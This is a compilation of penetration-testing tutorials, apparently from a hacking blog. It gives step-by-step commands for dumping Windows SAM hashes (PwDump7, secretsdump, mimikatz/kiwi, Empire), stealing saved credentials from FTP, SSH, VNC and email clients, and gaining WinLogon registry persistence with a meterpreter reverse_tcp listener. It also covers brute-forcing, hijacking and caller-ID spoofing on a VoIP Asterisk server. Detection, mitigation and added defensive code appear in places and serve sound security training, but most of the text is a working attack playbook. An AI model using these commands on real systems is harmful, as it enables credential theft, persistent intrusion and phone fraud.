NTLM v1 and NTLM v2 work in the same way, although there are a few differences: v1 is based on MD4 and v2 on MD5; the challenge/response length in v1 is 56 bits + 56 bits + 16 bits while v2 uses 128 bits; the C/R algorithm in v1 is DES (ECB mode) and in v2 HMAC-MD5; and lastly, the C/R value length in v1 is 64 bits + 64 bits + 64 bits while v2 uses 128 bits.

Now as we have understood these hashing systems, let’s focus on how to dump them. The methods we will focus on are best suited for both internal and external pen-testing. Let’s begin!

PwDump7

This tool was developed by Tarasco and you can download it from here. It extracts the SAM file from the system and dumps its credentials. To run it, execute the following command in a command prompt after downloading:

PwDump7.exe

As a result, it dumps all the hashes stored in the SAM file, as shown in the image above.

Now, we will save the SAM and SYSTEM registry hives to files on the system with the following commands:

reg save hklm\sam c:\sam
reg save hklm\system c:\system

We saved the hives with the above commands so that the data in the SAM file can be retrieved offline.

SamDump2

Once you have retrieved the SAM and SYSTEM hives, you can use the SamDump2 tool to dump the hashes with the following command:

samdump2 system sam

Impacket

Impacket's secretsdump.py can also extract all the hashes from the SAM file for you with the following command:

./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL

Metasploit Framework: HashDump

When you have a meterpreter session on a target, just run the hashdump command and it will dump all the hashes from the SAM file of the target system, as shown in the image below:

Another way to dump hashes is through a post-exploitation module that Metasploit offers. To use it, run the following commands:

use post/windows/gather/hashdump
set session 1
exploit

Metasploit Framework: credential_collector

Another way to dump credentials with Metasploit is via another built-in post-exploitation module. To use it, simply background your session and run the following commands:

use post/windows/gather/credentials/credential_collector
set session 1
exploit

Metasploit Framework: load kiwi

The next method Metasploit offers is firing up the mimikatz module. To load mimikatz, use the load kiwi command, then use the following command to dump the whole SAM file:

lsa_dump_sam

Hence, you have your passwords, as you can see in the image above.

Metasploit Framework: Invoke-Powerdump.ps1

Download Invoke-Powerdump Script

This Metasploit method involves PowerShell. After getting the meterpreter session, load the PowerShell extension with the command load powershell. Then use the following commands to run the Invoke-PowerDump.ps1 script:

powershell_import /root/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump

Once the above commands have run the script, you will have the dumped password hashes, just as in the image above.

Metasploit Framework: Get-PassHashes.ps1

Download Get-PassHashes Script

Again, via meterpreter, load the PowerShell extension with the command load powershell. Then, just as in the previous method, use the following commands to execute the script and retrieve the hashes:

powershell_import Get-PassHashes.ps1
powershell_execute Get-PassHashes

And voilà! All the passwords have been retrieved.

Koadic

Once you have a session in the Koadic C2, use the hashdump_sam module to get the hashes as shown below:

use hashdump_sam
execute

All the hashes from the SAM file will be dumped as shown in the above image.

PowerShell Empire: mimikatz/sam

Once you have a session in Empire, interact with it and use the mimikatz/sam module to dump the credentials with the following commands:

usemodule credentials/mimikatz/sam
execute

This module runs mimikatz and gets you all the password hashes by dumping the SAM file.

PowerShell Empire: credentials/powerdump

Empire offers yet another module that dumps credentials from the victim's system. This module does not invoke mimikatz like the previous one. To use it, type:

usemodule credentials/powerdump
execute

Yes!! You will have the hashes.

PowerShell

Download Invoke-Powerdump Script

This method is an excellent one for local testing, also known as internal testing. To use it, simply type the following in PowerShell:

Import-Module <path of the powerdump script>
Invoke-PowerDump

And, it will dump all the credentials for you.

LaZagne

LaZagne is an amazing tool for dumping all kinds of passwords. We have covered LaZagne in detail in a previous article; to visit it, click here. Now, to dump SAM hashes with LaZagne, just use the following command:

lazagne.exe all

Yay!!! All the credentials have been dumped.

Decrypting Hash: John The Ripper

John The Ripper is an amazing hash-cracking tool. We have dedicated two articles to it; to learn more about John The Ripper, click here: part 1, part 2. Once you have dumped the hashes from the SAM file by any of the methods above, you just need John The Ripper to crack them with the following command:

john --format=NT hash --show

As you can see, it reveals the password by cracking the given hash.

This article focused on dumping credentials from the Windows SAM file. Various methods were shown, using multiple platforms, to dump the credentials successfully. To secure yourself, you first must learn how a vulnerability can be exploited and to what extent; therefore, knowing such methods and what they can do is important.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


Credential Dumping: Applications


This is the sixth article in the Credential Dumping series. In this article, we learn how to dump credentials from various applications such as CoreFTP, FileZilla, WinSCP, PuTTY, etc.

Table of Content:

  • PowerShell Empire: SessionGopher
  • Credential Dumping: CoreFTP
    • Metasploit Framework
  • Credential Dumping: FTP Navigator
    • Metasploit Framework
    • LaZagne
  • Credential Dumping: FileZilla
    • Metasploit Framework
  • Credential Dumping: HeidiSQL
    • Metasploit Framework
  • Credential Dumping: Emails
    • Mail Pass View
  • Credential Dumping: Pidgin
    • Metasploit Framework
  • Credential Dumping: PSI
    • LaZagne
  • Credential Dumping: PST
    • PST Password
  • Credential Dumping: VNC
    • Metasploit Framework
  • Credential Dumping: WinSCP
    • LaZagne
    • Metasploit Framework

PowerShell Empire

Empire provides a module that retrieves the saved credentials of various applications such as PuTTY and WinSCP. It automatically finds the passwords and dumps them for you without requiring you to do anything. Once you have your session in Empire, use the following commands to execute the module:

usemodule credentials/sessiongopher
execute

As you can see in the images above and below, it successfully retrieves the passwords for WinSCP and PuTTY.

Now we will focus on a few applications and see how we can retrieve their passwords. We will go through the applications one by one. Let's get going!

CoreFTP: Metasploit Framework

Core FTP is an FTP server and client made especially for Windows. It lets you send and receive files over the network using the FTP protocol, which makes it relatively easy to use regardless of the operating system at the other end.

With the help of Metasploit we can dump the credentials saved in the registry of the target system; the passwords are stored under HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. Once you have a session, run the post module by typing:

use post/windows/gather/credentials/coreftp
set session 1
exploit

FTP Navigator: LaZagne

Just like Core FTP, FTP Navigator is an FTP client that makes transferring, editing and renaming files over the network easy. It also allows you to keep local and remote directories in sync. Run the command lazagne.exe all and you will have the FTP Navigator credentials as shown below:

FTPNavigator: Metasploit Framework

The credentials of FTP Navigator can also be dumped using Metasploit, as there is a built-in post module for it. To use it, type:

use post/windows/gather/credentials/ftpnavigator
set session 1
exploit

As you can see in the image above, as expected we have the credentials.

FileZilla: Metasploit Framework

FileZilla is another open-source client/server software that uses the FTP protocol. It is compatible with Windows, Linux and macOS and is again used for transferring, editing or replacing files over a network. We can dump its credentials using Metasploit; to do so, type:

use post/multi/gather/filezilla_client_cred
set session 1
exploit

And so, we have successfully retrieved the credentials.

HeidiSQL: Metasploit Framework

HeidiSQL is an open-source tool for MySQL, MSSQL, PostgreSQL and SQLite. When using HeidiSQL, numerous sessions with their connections can be saved along with the credentials, and it also lets you run multiple sessions in a single window, which makes managing databases pretty easy. Again, using Metasploit, we can get our hands on its credentials with the following post module:

use post/windows/gather/credentials/heidisql
set session 1
exploit

Email: Mail PassView

All the email passwords stored on the system can be retrieved with the help of a tool named Mail PassView. This tool is developed by NirSoft and is best suited for internal pentesting. Simply download the software from here and launch it to get the credentials as shown below:

Pidgin: Metasploit Framework

Pidgin is an instant messaging client that lets you chat on multiple networks. It is compatible with every operating system and also allows you to transfer files. There is a built-in post module for Pidgin in Metasploit, too. To run it, use the following commands:

use post/multi/gather/pidgin_cred
set session 1
exploit

And all the credentials will be on your screen.

PSI: LaZagne

Psi is an instant messenger that works over the XMPP network. It also allows you to transfer files, is highly customizable and comes in various languages. Using the lazagne.exe chat command you can dump its password as shown in the image below:

PST: PstPassword

NirSoft provides a tool, PstPassword, which lets you retrieve the passwords of Outlook PST files. You can download it from here. Simply launch the tool and you will have the passwords as shown below:

VNC: Metasploit Framework

VNC is remote access software which allows you to access your device from anywhere in the world. VNC passwords can be easily retrieved using Metasploit; to do so, type:

use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP: LaZagne

WinSCP is an FTP/SFTP client based on the SSH implementation from PuTTY. It has a graphical interface, can be operated in multiple languages and also acts as a remote editor. Both LaZagne and Metasploit help us retrieve its passwords. In LaZagne, use the command lazagne.exe all and it will dump the credentials as shown in the image below:

WinSCP: Metasploit Framework

To retrieve the credentials with Metasploit, use the following post module:

use post/windows/gather/credentials/winscp
set session 1
exploit

This way, you can retrieve credentials of multiple applications.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


Windows Persistence using WinLogon


In this article, we are going to describe the ability of the WinLogon process to provide persistent access to the Target Machine.

Table of Content

  • Introduction
  • Configurations used in Practical
  • Default Registry Key Values
  • Persistence using WinLogon
    • Using Userinit Key
    • Using the Shell Key
  • Detection
  • Mitigation

Introduction

The Winlogon process is a very important part of the Windows operating system, and Windows will be unusable without it.

This process performs many important tasks related to the Windows sign-in process. For example, when you sign in, Winlogon is responsible for loading your user profile into the registry; hence each Windows user account depends on Winlogon to use the keys under HKEY_CURRENT_USER, which are unique to each user account.

Winlogon has special hooks into the system and watches to see if you press Ctrl+Alt+Delete. This is known as the “secure attention sequence”, and it’s why some PCs may be configured to require you to press Ctrl+Alt+Delete before you sign in. This combination of keyboard shortcuts is constantly caught by Winlogon, which guarantees you’re signing in on a safe desktop where different programs can’t monitor the password you’re typing or impersonate a sign-in dialog.

The Windows Logon Application additionally monitors keyboard and mouse activity and is responsible for locking your PC and starting screen savers after a period of no activity.

Microsoft's official documentation provides a more detailed, technical list of Winlogon's responsibilities.

Configurations used in Practical

  • Attacker:
    • OS: Kali Linux 2020.1
    • IP: 192.168.1.112
  • Target:
    • OS: Windows 10
    • IP: 192.168.1.104

Default Registry Key Values

As discussed in the introduction, the WinLogon process controls HKEY_CURRENT_USER, but as Windows proprietary software its own configuration values are located under HKEY_LOCAL_MACHINE. To look at the registry values for WinLogon, open the Registry Editor by typing regedit in the Run dialog, then traverse to the following location:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Here, among many other values, we see values named Userinit and Shell of type REG_SZ. We will use these to gain persistence on the machine. The scenario is that the attacker has already obtained a meterpreter session on the target machine, by any method of their choice, and then uses that session to alter the WinLogon registry values so as to turn it into a persistent session.

Persistence using Userinit Key

Transferring Malicious Executable

We created a malicious executable named raj.exe using the msfvenom tool; more about that here. Using the meterpreter session we already obtained, we transfer this executable to the target machine with meterpreter's upload command. After the file is uploaded, we run the shell command.

upload /root/raj.exe

Modifying Registry Values

Since we have a shell on the target system, we used the "reg query" command to get information about the Userinit value of WinLogon and see that it holds the default value we saw earlier. Then, using the "reg add" command, we modified the value to include the malicious executable as well.

shell
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit

We ran the “reg query” command again to ensure that the values are indeed modified.

We can also verify the modification manually here as shown in this image below.

Gaining Persistent Shell

Now that we have made the changes in the registry, we should get a persistent shell as soon as WinLogon is triggered, provided a listener is set up for the session that is generated. The listener must use the same IP address and port that were used when crafting the payload. Here we can see that we have a persistent shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 4444
exploit

Persistence using Shell Key

We got persistence using the Userinit value. Now let's focus on another value that can be used to achieve persistence on the target machine: the Shell value. By default it holds explorer.exe, as shown below.

Modifying Registry Values

As in the previous practice, we gain a meterpreter session, transfer the payload to the target machine using the upload command, and then add the name of the executable to the registry value using the reg add command.

upload /root/raj.exe
shell
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, raj.exe" /f

We can verify that the payload is indeed added to the Shell value by going to the following location in the Registry Editor:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Gaining Persistent Shell

Now that we have made the changes in the registry, we should get a persistent shell as soon as WinLogon is triggered, provided a listener is set up for the session that is generated. The listener must use the same IP address and port that were used when crafting the payload. Here we can see that we have a persistent shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 4444
exploit

Detection

  • Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc.
  • Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the current Winlogon helper values.
  • New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
  • Look for abnormal process behaviour that may be due to a process loading a malicious DLL.
  • Data and events should not be viewed in isolation but as part of a chain of behaviour that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
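The first detection bullet, implemented as an added example (not from the article): it scans registry-write events for the Winlogon Userinit and Shell values and raises an alert whenever the written list deviates from a baseline. The records are constructed and shaped like Sysmon Event ID 13 (RegistryEvent: value set); the field names follow Sysmon, while the sample events and the default values are assumptions.

```python
from typing import Dict, Iterable, List

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Baseline contents of the two values (assumption: Windows 10 defaults; confirm on a
# clean build). Winlogon treats both as comma-separated lists, so they are compared
# element by element, by file name, rather than as whole strings.
EXPECTED_VALUES = {
    "Userinit": r"C:\Windows\system32\userinit.exe,",
    "Shell": "explorer.exe",
}


def _entries(details: str) -> List[str]:
    """Split a Winlogon value into its comma-separated program entries."""
    return [e.strip().lower() for e in details.split(",") if e.strip()]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def winlogon_alerts(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return one alert per registry SetValue event that changes Userinit or Shell
    to something other than the baseline: extra entries (a helper such as raj.exe
    appended) or missing ones (the legitimate program replaced)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        key, _, value_name = str(ev.get("TargetObject", "")).rpartition("\\")
        if key.lower() != WINLOGON_KEY.lower() or value_name not in EXPECTED_VALUES:
            continue
        expected = {_basename(e) for e in _entries(EXPECTED_VALUES[value_name])}
        actual = {_basename(e) for e in _entries(str(ev.get("Details", "")))}
        extra, missing = sorted(actual - expected), sorted(expected - actual)
        if extra or missing:
            alerts.append({
                "value": value_name,
                "extra": extra,
                "missing": missing,
                "writer": ev.get("Image"),
                "time": ev.get("UtcTime"),
            })
    return alerts


# Constructed sample events. The first two mirror the reg add commands in the article;
# the third is a benign write of the default value; the fourth touches an unrelated key.
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2020-03-30 10:15:01.000",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": WINLOGON_KEY + r"\Userinit", "Details": "Userinit.exe, raj.exe"},
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2020-03-30 10:16:40.000",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": WINLOGON_KEY + r"\Shell", "Details": "explorer.exe, raj.exe"},
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2020-03-30 11:00:00.000",
     "Image": r"C:\Windows\servicing\TrustedInstaller.exe",
     "TargetObject": WINLOGON_KEY + r"\Shell", "Details": "explorer.exe"},
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2020-03-30 11:05:00.000",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Contoso\Agent\Mode", "Details": "1"},
]

if __name__ == "__main__":
    for alert in winlogon_alerts(SAMPLE_EVENTS):
        print(alert)
```

The same comparison can be run as a point-in-time audit against the `reg query` output shown earlier, or against the Winlogon entries Autoruns lists, which covers hosts without Sysmon.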

Mitigation

  • Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting tools like AppLocker that are capable of auditing and/or blocking unknown DLLs.
  • Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the COVID-19. I am writing this article while Working from home. Take care and be Healthy!

Reference: MITRE ATT&CK

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. He can be contacted on Twitter and LinkedIn.


Penetration Testing on VoIP Asterisk Server


Today we will learn about VoIP penetration testing, including enumeration, information gathering, user extension and password enumeration, SIP registration hijacking and spoofing.

Table of Content

  • Introduction to VoIP
    • Uses of VoIP
  • SIP Protocol
    • SIP Requests
    • SIP Responses
    • SIP Interaction Structure
  • Real-Time Transport Protocol
  • Configurations Used in Practical
  • Setting Viproy VoIP Kit
  • Identifying SIP Servers
  • Extension Brute-force
  • Extension Registration
  • Call Spoofing
  • Log Monitoring
  • Sniffing Calls using Wireshark

Introduction to VoIP

VoIP means Voice over Internet Protocol, also called IP telephony; it is used for communication. VoIP technology lets you make audio calls over an Internet connection instead of a regular phone line (landline or mobile). Some VoIP providers only allow you to call other people using the same service, while others let you call anyone who has a telephone number, including local, long-distance, mobile and international numbers. Some VoIP services only work over your computer or a special VoIP phone (for example a Cisco or Polycom handset).

VoIP uses port 5060 by default as its SIP signalling port. This is the port used for registration when a phone (for example a Cisco or Polycom handset) registers with Asterisk.

The following functionality is commonly used within VoIP installations but is not common in legacy telephony networks:

  • Usage of multiple lines (PRI lines, BRI Lines) and extensions
  • Voicemail service
  • Voice recording
  • Administrative Control
  • Register calls
  • Modular Configurations
  • IVR and welcome messages

SIP Protocol

The Session Initiation Protocol (SIP) allows us to establish, end or change voice or video calls. The voice or video traffic itself is transmitted via the Real-Time Transport Protocol (RTP). SIP is an application-layer protocol that uses UDP or TCP as its transport. By default, SIP uses port 5060 UDP/TCP for unencrypted traffic and port 5061 for TLS-encrypted traffic. As we will see later, Man-in-the-Middle (MITM) attack vectors exist for all types of communication, including VoIP/SIP; therefore, encryption is a necessary compensating control regardless of the environment or service method. SIP is ASCII-based and very similar to HTTP, as it uses a request/response model: requests to the SIP client are made through a SIP URI (and, with Asterisk, via AGI) by a user agent, much like an HTTP request made by a web browser.

SIP Requests

The following request types are common within SIP:

| Sno. | Request   | Description                                                                  |
| 1.   | INVITE    | The client is being invited to participate in a call session                 |
| 2.   | ACK       | Confirms that the client has received a final response to an INVITE request  |
| 3.   | BYE       | Terminates a call and can be sent by either the caller or the callee         |
| 4.   | CANCEL    | Deletes any pending request                                                  |
| 5.   | OPTIONS   | Queries the capabilities of servers                                          |
| 6.   | REGISTER  | Registers the address listed in the header field with a SIP server           |
| 7.   | PRACK     | Provisional acknowledgement                                                  |
| 8.   | SUBSCRIBE | Subscribes for an event of notification from the notifier                    |
| 9.   | NOTIFY    | Notifies the subscriber of a new event                                       |
| 10.  | PUBLISH   | Publishes an event to the server                                             |
| 11.  | INFO      | Sends mid-session information that does not modify the session state         |
| 12.  | REFER     | Asks the recipient to issue a SIP request (call transfer)                    |
| 13.  | MESSAGE   | Transports instant messages using SIP                                        |
| 14.  | (request name missing from source) | Modifies the state of the session without changing the state of the dialogue |

SIP Responses

We can understand the Responses using the Response code. The general categories of the Response codes are given below:

  • 1xx (Informational)
  • 2xx (Success)
  • 3xx (Redirection)
  • 4xx (Failed requests)
  • 5xx (Server failure: the server cannot complete the request)
  • 6xx (Global errors)

SIP Interaction Structure

The Typical SIP Interaction Structure consists of the following:

  1. The sender initiates an INVITE request.
  2. The receiver sends back a 100 (Trying) response.
  3. The receiver starts ringing and sends back a 180 (Ringing) response.
  4. The receiver picks up the phone and a 200 (OK) success response is sent.
  5. An ACK is sent by the initiator.
  6. The call proceeds using RTP.
  7. A BYE request is sent to end the call.
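An added example, not part of the original article: a minimal SIP parser in Python that classifies messages by the request and response tables above, together with the log-monitoring check a defender would run for the extension brute-force listed in the table of content, namely repeated REGISTER failures from one client address. The capture is constructed; 192.168.1.20 is an assumed client, and the other addresses are the lab addresses from this article.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Request methods from the table above; anything else is flagged as unknown.
REQUEST_METHODS = {"INVITE", "ACK", "BYE", "CANCEL", "OPTIONS", "REGISTER", "PRACK",
                   "SUBSCRIBE", "NOTIFY", "PUBLISH", "INFO", "REFER", "MESSAGE"}
RESPONSE_CLASSES = {1: "Informational", 2: "Success", 3: "Redirection",
                    4: "Failed request", 5: "Server failure", 6: "Global error"}


@dataclass
class SipMessage:
    is_request: bool
    method: Optional[str]          # set for requests
    status: Optional[int]          # set for responses
    headers: Dict[str, str]        # header names lower-cased
    body: str


def parse_sip(raw: str) -> SipMessage:
    """Parse one SIP message. Like HTTP: a start line, headers, a blank line, a body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    parts = lines[0].split()
    if parts and parts[0] == "SIP/2.0":            # status line: SIP/2.0 <code> <reason>
        return SipMessage(False, None, int(parts[1]), headers, body)
    return SipMessage(True, parts[0].upper(), None, headers, body)   # <METHOD> <URI> SIP/2.0


def describe(msg: SipMessage) -> str:
    """Label a message using the request table and the response-code classes above."""
    if msg.is_request:
        kind = "known" if msg.method in REQUEST_METHODS else "unknown"
        return f"request {msg.method} ({kind} method)"
    cls = RESPONSE_CLASSES.get(msg.status // 100, "unknown class")
    return f"response {msg.status} ({msg.status // 100}xx {cls})"


def register_failures_by_source(raw_messages: Iterable[str], threshold: int = 5) -> Dict[str, int]:
    """Count 401/403/404 responses to REGISTER per client address (taken from the Via
    header, which a response copies from the request) and return the addresses at or
    above the threshold. One 401 per registration is normal (the digest challenge);
    a run of failures across many extensions is what an extension sweep looks like."""
    counts: Dict[str, int] = defaultdict(int)
    for raw in raw_messages:
        msg = parse_sip(raw)
        if msg.is_request or msg.status not in (401, 403, 404):
            continue
        if not msg.headers.get("cseq", "").upper().endswith("REGISTER"):
            continue
        via = msg.headers.get("via", "")
        host = via.split()[-1].split(";")[0] if via else "unknown"
        counts[host] += 1
    return {host: n for host, n in counts.items() if n >= threshold}


def _msg(start_line: str, headers: Dict[str, str]) -> str:
    """Build raw SIP text for the constructed capture below."""
    return start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items()) + "\r\n"


# Constructed capture: one legitimate call setup from 192.168.1.20 (assumed client),
# then six failed registrations for consecutive extensions from 192.168.1.4.
SAMPLE_CAPTURE: List[str] = [
    _msg("INVITE sip:200@192.168.1.7 SIP/2.0", {"Via": "SIP/2.0/UDP 192.168.1.20:5060;branch=z9hG4bK1",
         "From": "<sip:100@192.168.1.7>", "To": "<sip:200@192.168.1.7>", "Call-ID": "call-1", "CSeq": "1 INVITE"}),
    _msg("SIP/2.0 180 Ringing", {"Via": "SIP/2.0/UDP 192.168.1.20:5060;branch=z9hG4bK1",
         "Call-ID": "call-1", "CSeq": "1 INVITE"}),
]
for ext in range(100, 106):
    hdrs = {"Via": "SIP/2.0/UDP 192.168.1.4:5060;branch=z9hG4bKr", "To": f"<sip:{ext}@192.168.1.7>",
            "Call-ID": f"reg-{ext}", "CSeq": "1 REGISTER"}
    SAMPLE_CAPTURE.append(_msg("REGISTER sip:192.168.1.7 SIP/2.0", hdrs))
    SAMPLE_CAPTURE.append(_msg("SIP/2.0 403 Forbidden", hdrs))

if __name__ == "__main__":
    for raw in SAMPLE_CAPTURE[:2]:
        print(describe(parse_sip(raw)))
    print("register failures:", register_failures_by_source(SAMPLE_CAPTURE))
```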

Real-time Transport Protocol

RTP is a network protocol for delivering audio and video over IP networks. It is used in communication and entertainment systems that involve streaming media, such as telephony, video and teleconferencing applications. RTP's default port range is 16384 to 32767; these ports carry the media of SIP calls. In our scenario, we use the UDP port range 10000-20000 for the RTP media streams (voice and video channels).

Configurations used in Practical

  • Attacker:
    • OS: Kali Linux 2020.1
    • IP: 192.168.1.4
  • Target:
    • VOIP Server: Trixbox
    • VOIP Client: Zoiper
    • IP: 192.168.1.7

We have already published an article on how to set up a VoIP server. Please read it before proceeding further; we will be using the same server that we configured in that article.

Lab Setup for VOIP Penetration Testing

Setting up Viproy VoIP Kit

Before beginning the penetration testing, we need to add the Viproy VoIP kit to our Metasploit. A detailed procedure on how to add modules to Metasploit can be found here. The steps depicted are taken from Rapid7 and the Viproy author.

We need to install some dependencies. First we update our sources, then install the following:

sudo apt update && sudo apt install -y git autoconf build-essential libcap-dev libpq-dev zlib1g-dev libsqlite3-dev

Once we are done installing all the dependencies, it's time to clone the Viproy repository to our Kali Linux. It contains the modules that we need to add to our Metasploit Framework.

git clone https://github.com/fozavci/viproy-VoIPkit.git

Here we can see that we have the lib directory and the modules directory as well as the kaliinstall script.

Before running the script, we need to manually copy the contents of the lib directory and the modules directory to the Metasploit’s lib and modules directory respectively.

cp lib/msf/core/auxiliary/* /usr/share/metasploit-framework/lib/msf/core/auxiliary/
cp modules/auxiliary/VoIP/viproy-VoIPkit* /usr/share/metasploit-framework/modules/auxiliary/VoIP/
cp modules/auxiliary/spoof/cisco/viproy-VoIPkit_cdp.rb /usr/share/metasploit-framework/modules/auxiliary/spoof/cisco/

Now we need to add entries for the modules we copied to the mixins file located at /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb.

echo "require 'msf/core/auxiliary/sip'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/skinny'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/msrp'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb

This can also be done manually with a text editor.

This is all that we needed to do. If this method doesn't work or gives errors, the author was kind enough to provide a pre-compiled version. To install that, we follow these steps.

First, we clone the precompiled version from GitHub.

git clone https://github.com/fozavci/metasploit-framework-with-viproy-VoIPkit.git

Then we traverse into the cloned directory and install the required gems using bundler.

cd metasploit-framework-with-viproy-VoIPkit/
gem install bundler
bundle install

It will take some time. After it's done, we need to reload the modules in the Metasploit Framework.

reload_all

That was the installation of the Viproy Toolkit. Let’s start Penetration Testing on our VoIP Server.

In a VoIP network, the information that can prove useful includes VoIP gateways or servers, IP-PBX systems, client software (softphones)/VoIP phones, and user extensions. Let's have a look at some of the widely used tools for enumeration and fingerprinting.

Identifying SIP Servers

Using the Metasploit SIP options scanner module, we can identify VoIP servers and their enabled options by providing a single IP address or a range of IP addresses.

use auxiliary/scanner/sip/options
set rhosts 192.168.1.0/24
run

Here, we can see that our scan found a VoIP server running on 192.168.1.7. We can also see that it reports the User-Agent "Asterisk" and that it has multiple request methods enabled.

Extension Bruteforce

Next, we will brute-force the target server to extract the extensions and their passwords (secrets). For this particular practical, we made two dictionaries: one for the usernames and the other for the passwords. Next, we need to define the range for the extensions. We chose the range 0000000 to 99999999. Then we run the module.

use auxiliary/voip/viproy_sip_bruteforce
set rhosts 192.168.1.7
set minext 00000000
set maxext 99999999
set user_file /home/kali/user.txt
set pass_file /home/kali/pass.txt
exploit

Here, we can see that we were able to extract 10 extensions. Ensure that the secret that we set up for each extension is difficult to guess, to prevent brute-force attacks of this kind.

Extension Registration

Since we have the extensions and the secrets, it's time to move one step ahead and register an extension so that we can initiate calls from the attacker machine. We chose the extension 99999999, whose secret we cracked as 999. Now, all we have to do is provide the server IP address, the extension and the secret. As soon as we run the auxiliary, we get a 200 OK response from the server telling us that the extension is registered with this IP address.

use auxiliary/voip/viproy_sip_register
set rhosts 192.168.1.7
set username 99999999
set password 999
run

Here, we have to register the softphone because we don't have a trunk line, PSTN lines or a PRI line for making outgoing calls. Hence, we are testing extension-to-extension calling.

Call Spoofing

In the previous practical, we registered the extension 99999999; now we will use it to call the extension 00000000. Here we can spoof the caller ID to whatever we want; we have set it to Hacker. We need to set login to true so that the module logs in to the server with the 999 secret. We also have to set numeric_users to true so that it accepts numeric extensions.

use auxiliary/voip/viproy_sip_invite
set rhosts 192.168.1.7
set to 00000000
set from 99999999
set login true
set fromname hacker
set username 99999999
set password 999
set numeric_users true
run

As soon as we run the auxiliary, we can see that a call is initiated from the extension 99999999 to the extension 00000000, which we set up on our Zoiper client. We can also see the Hacker caller ID that we set in the auxiliary.

Log Monitoring

We can monitor the logs on the VoIP server, which contain information about all the calls that were initiated, connected or dropped, along with all the extensions and other important information. To reach the server we can always brute-force its credentials or check for default credentials. First, we connect to the server using SSH, and then we run the following command to open the Asterisk console. This console records the logs in real time.

ssh 192.168.1.7
asterisk -rvvvvvvvvvvvvvvv

Sniffing Calls using Wireshark

When users initiate a phone call, we can observe the captured SIP traffic using Wireshark. We launch Wireshark and choose the network adapter on which the VoIP server is reachable. Then we start capturing packets. If we observe closely, we can see that there is a tab called Telephony in Wireshark's menu. In the drop-down menu, the first option is "VoIP Calls".

As soon as we click on the VoIP Calls, a window opens up showing all the calls that have been captured during the sniffing. We see that there is a sequence of packets from one IP Address to another.

If we click on the Flow Sequence button at the bottom, we can see the SIP communication handshakes that we learned about in the introduction.

In this picture, we can analyse a call in detail. A SIP call flow contains several SIP transactions. A SIP transaction consists of several requests and responses, and the way to group them into the same transaction is the CSeq header (CSeq: 103 in this capture).

The first step must be registering the extension. The step after registration corresponds to session establishment: the session from extension 99999999 begins with an INVITE request to extension 00000000. Immediately, the proxy sends a 100 Trying to stop retransmissions of the INVITE and reroutes the request to extension 00000000.

The extension 00000000 sends a 180 Ringing when the telephone begins to ring, and it is also rerouted by the proxy to the calling user. Finally, the 200 OK message corresponds to the accept process (the extension 00000000 answers the call). After ringing, the call server tries to assign the RTP ports, and the RTP transport starts with the parameters (ports, addresses, codecs, etc.) negotiated through SDP. The last transaction corresponds to the session end. This is carried out with a single BYE request to the proxy, which is later rerouted to extension 00000000.

